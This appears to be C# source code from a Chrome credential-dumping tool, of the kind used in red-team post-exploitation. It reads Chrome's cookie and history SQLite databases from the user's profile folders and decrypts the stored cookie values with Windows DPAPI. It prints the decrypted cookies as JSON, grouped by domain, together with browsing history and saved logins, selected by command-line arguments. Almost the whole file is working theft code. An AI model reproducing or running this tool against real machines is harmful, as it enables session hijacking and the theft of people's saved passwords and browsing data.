public static void ParseChromeHistory(string historyFilePath, string user, HostCookies[] cookies) { SQLiteDatabase database = new SQLiteDatabase(historyFilePath); string query = "SELECT url, title, visit_count, last_visit_time FROM urls ORDER BY visit_count;"; DataTable resultantQuery = database.ExecuteQuery(query); database.CloseDatabase(); foreach (DataRow row in resultantQuery.Rows) { var lastVisitTime = row["last_visit_time"]; Console.WriteLine("--- Chrome History (User: {0}) ---", user); Console.WriteLine("URL : {0}", row["url"]); if (row["title"] != String.Empty) { Console.WriteLine("Title : {0}", row["title"]); } else { Console.WriteLine("Title : No Title"); } Console.WriteLine("Visit Count : {0}", row["visit_count"]); HostCookies matching = FilterHostCookies(cookies, row["url"].ToString()); Console.WriteLine("Cookies : {0}", matching.ToJSON()); Console.WriteLine(); } }
public HistoricUrl(DataRow row, HostCookies[] cookies) { Url = row["url"].ToString(); Title = row["title"].ToString(); int.TryParse(row["visit_count"].ToString(), out VisitCount); Cookies = HostCookies.FilterHostCookies(cookies, Url); }
public static HostCookies[] SortCookieData(DataTable cookieTable) { List <Cookie> cookies = new List <Cookie>(); List <HostCookies> hostCookies = new List <HostCookies>(); HostCookies hostInstance = null; string lastHostKey = ""; foreach (DataRow row in cookieTable.Rows) { if (row["host_key"].GetType() != typeof(System.DBNull) && lastHostKey != (string)row["host_key"]) { lastHostKey = (string)row["host_key"]; if (hostInstance != null) { hostInstance.Cookies = cookies.ToArray(); hostCookies.Add(hostInstance); } hostInstance = new HostCookies(); hostInstance.HostName = lastHostKey; cookies = new List <Cookie>(); } Cookie cookie = new Cookie(); cookie.Domain = row["host_key"].ToString(); long expDate; Int64.TryParse(row["expires_utc"].ToString(), out expDate); // cookie.ExpirationDate = (expDate / 1000000) - 11644473600; cookie.HostOnly = false; // I'm not sure this is stored in the cookie store and seems to be always false if (row["is_httponly"].ToString() == "1") { cookie.HttpOnly = true; } else { cookie.HttpOnly = false; } cookie.Name = row["name"].ToString(); cookie.Path = row["path"].ToString(); cookie.SameSite = "no_restriction"; // Not sure if this is the same as firstpartyonly if (row["is_secure"].ToString() == "1") { cookie.Secure = true; } else { cookie.Secure = false; } cookie.Session = false; // Unsure, this seems to be false always cookie.StoreId = "0"; // Static byte[] cookieValue = Convert.FromBase64String(row["encrypted_value"].ToString()); cookieValue = ProtectedData.Unprotect(cookieValue, null, DataProtectionScope.CurrentUser); cookie.Value = System.Text.Encoding.ASCII.GetString(cookieValue); cookies.Add(cookie); } return(hostCookies.ToArray()); }
public static HostCookies FilterHostCookies(HostCookies[] hostCookies, string url) { HostCookies results = new HostCookies(); List <String> hostPermutations = new List <String>(); // First retrieve the domain from the url string domain = url; // determine if url or raw domain name if (domain.IndexOf('/') != -1) { domain = domain.Split('/')[2]; } results.HostName = domain; string[] domainParts = domain.Split('.'); for (int i = 0; i < domainParts.Length; i++) { if ((domainParts.Length - i) < 2) { // We've reached the TLD. Break! break; } string[] subDomainParts = new string[domainParts.Length - i]; Array.Copy(domainParts, i, subDomainParts, 0, subDomainParts.Length); string subDomain = String.Join(".", subDomainParts); hostPermutations.Add(subDomain); hostPermutations.Add("." + subDomain); } List <Cookie> cookies = new List <Cookie>(); foreach (string sub in hostPermutations) { // For each permutation foreach (HostCookies hostInstance in hostCookies) { // Determine if the hostname matches the subdomain perm if (hostInstance.HostName == sub) { // If it does, cycle through foreach (Cookie cookieInstance in hostInstance.Cookies) { // No dupes if (!cookies.Contains(cookieInstance)) { cookies.Add(cookieInstance); } } } } } results.Cookies = cookies.ToArray(); return(results); }
public static HostCookies[] ParseChromeCookies(string cookiesFilePath, string user, bool printResults = false, string[] domains = null) { SQLiteDatabase database = new SQLiteDatabase(cookiesFilePath); string query = "SELECT * FROM cookies ORDER BY host_key"; DataTable resultantQuery = database.ExecuteQuery(query); database.CloseDatabase(); // This will group cookies based on Host Key HostCookies[] rawCookies = SortCookieData(resultantQuery); if (printResults) { if (domains != null) { foreach (string domain in domains) { HostCookies hostInstance = FilterHostCookies(rawCookies, domain); Console.WriteLine("--- Chrome Cookie (User: {0}) ---", user); Console.WriteLine("Domain : {0}", hostInstance.HostName); Console.WriteLine("Cookies (JSON) : {0}", hostInstance.ToJSON()); Console.WriteLine(); } } else { foreach (HostCookies cookie in rawCookies) { Console.WriteLine("--- Chrome Cookie (User: {0}) ---", user); Console.WriteLine("Domain : {0}", cookie.HostName); Console.WriteLine("Cookies (JSON) : {0}", cookie.ToJSON()); Console.WriteLine(); } } } // Parse the raw cookies into HostCookies that are grouped by common domain return(rawCookies); }
private bool CookieHostNameMatch(HostCookies cookie, string hostName) { return(cookie.HostName == hostName); }
private HostCookies[] ExtractCookiesFromSQLQuery(DataTable query) { List <Cookie> cookies = new List <Cookie>(); List <HostCookies> hostCookies = new List <HostCookies>(); HostCookies hostInstance = null; string lastHostKey = ""; foreach (DataRow row in query.Rows) { if (row == null) { continue; } if (row["host_key"].GetType() != typeof(System.DBNull) && lastHostKey != (string)row["host_key"]) { lastHostKey = (string)row["host_key"]; if (hostInstance != null) { hostInstance.Cookies = cookies.ToArray(); hostCookies.Add(hostInstance); } hostInstance = new HostCookies(); hostInstance.HostName = lastHostKey; cookies = new List <Cookie>(); } Cookie cookie = new Cookie(); cookie.Domain = row["host_key"].ToString(); long expDate; Int64.TryParse(row["expires_utc"].ToString(), out expDate); // if ((expDate / 1000000.000000000000) - 11644473600 > 0) { cookie.ExpirationDate = (expDate / 1000000.000000000000000) - 11644473600; } cookie.HostOnly = cookie.Domain[0] == '.' ? false : true; // I'm not sure this is stored in the cookie store and seems to be always false if (row["is_httponly"].ToString() == "1") { cookie.HttpOnly = true; } else { cookie.HttpOnly = false; } cookie.Name = row["name"].ToString(); cookie.Path = row["path"].ToString(); // cookie.SameSite = "no_restriction"; // Not sure if this is the same as firstpartyonly if (row["is_secure"].ToString() == "1") { cookie.Secure = true; } else { cookie.Secure = false; } cookie.Session = row["is_persistent"].ToString() == "0" ? true : false; // Unsure, this seems to be false always //cookie.StoreId = "0"; // Static cookie.StoreId = null; cookie.SetSameSiteCookie(row["sameSite"].ToString()); byte[] cookieValue = Convert.FromBase64String(row["encrypted_value"].ToString()); cookieValue = DecryptBlob(cookieValue); if (cookieValue != null) { cookie.Value = System.Text.Encoding.ASCII.GetString(cookieValue); } else { cookie.Value = ""; } if (cookie != null) { cookies.Add(cookie); } } return(hostCookies.ToArray()); }
static void Main(string[] args) { // Path builder for Chrome install location string homeDrive = System.Environment.GetEnvironmentVariable("HOMEDRIVE"); string homePath = System.Environment.GetEnvironmentVariable("HOMEPATH"); string localAppData = System.Environment.GetEnvironmentVariable("LOCALAPPDATA"); string[] paths = new string[2]; paths[0] = homeDrive + homePath + "\\Local Settings\\Application Data\\Google\\Chrome\\User Data"; paths[1] = localAppData + "\\Google\\Chrome\\User Data"; //string chromeLoginDataPath = "C:\\Users\\Dwight\\Desktop\\Login Data"; string[] validArgs = { "all", "full", "logins", "history", "cookies" }; bool getCookies = false; bool getHistory = false; bool getBookmarks = false; bool getLogins = false; bool useTmpFile = false; bool useBCryptDecryption = false; ChromeCredentialManager chromeManager = new ChromeCredentialManager(); // For filtering cookies List <String> domains = new List <String>(); if (args.Length == 0) { Usage(); return; } // Parse the arguments. for (int i = 0; i < args.Length; i++) { // Valid arg! string arg = args[i].ToLower(); if (Array.IndexOf(validArgs, arg) != -1) { if (arg == "all" || arg == "full") { getCookies = true; getHistory = true; getLogins = true; } else if (arg == "logins") { getLogins = true; } else if (arg == "history") { getHistory = true; } else if (arg == "cookies") { getCookies = true; } else { Console.WriteLine("[X] Invalid argument passed: {0}", arg); } } else if (getCookies && arg.Contains(".")) { // must be a domain! domains.Add(arg); } else { Console.WriteLine("[X] Invalid argument passed: {0}", arg); } } string[] domainArray = domains.ToArray(); if (!getCookies && !getHistory && !getLogins) { Usage(); return; } // Main loop, path parsing and high integrity check taken from GhostPack/SeatBelt try { if (getCookies) { var cookies = chromeManager.GetCookies(); if (domainArray != null && domainArray.Length > 0) { foreach (var domain in domainArray) { var subCookies = HostCookies.FilterHostCookies(cookies, domain); subCookies.Print(); } } else { foreach (var cookie in cookies) { cookie.Print(); } } } if (getHistory) { var history = chromeManager.GetHistory(); foreach (var item in history) { item.Print(); } } if (getLogins) { var logins = chromeManager.GetSavedLogins(); foreach (var login in logins) { login.Print(); } } Console.WriteLine("[*] Done."); } catch (Exception ex) { Console.WriteLine("[X] Exception: {0}\n\n{1}", ex.Message, ex.StackTrace); } }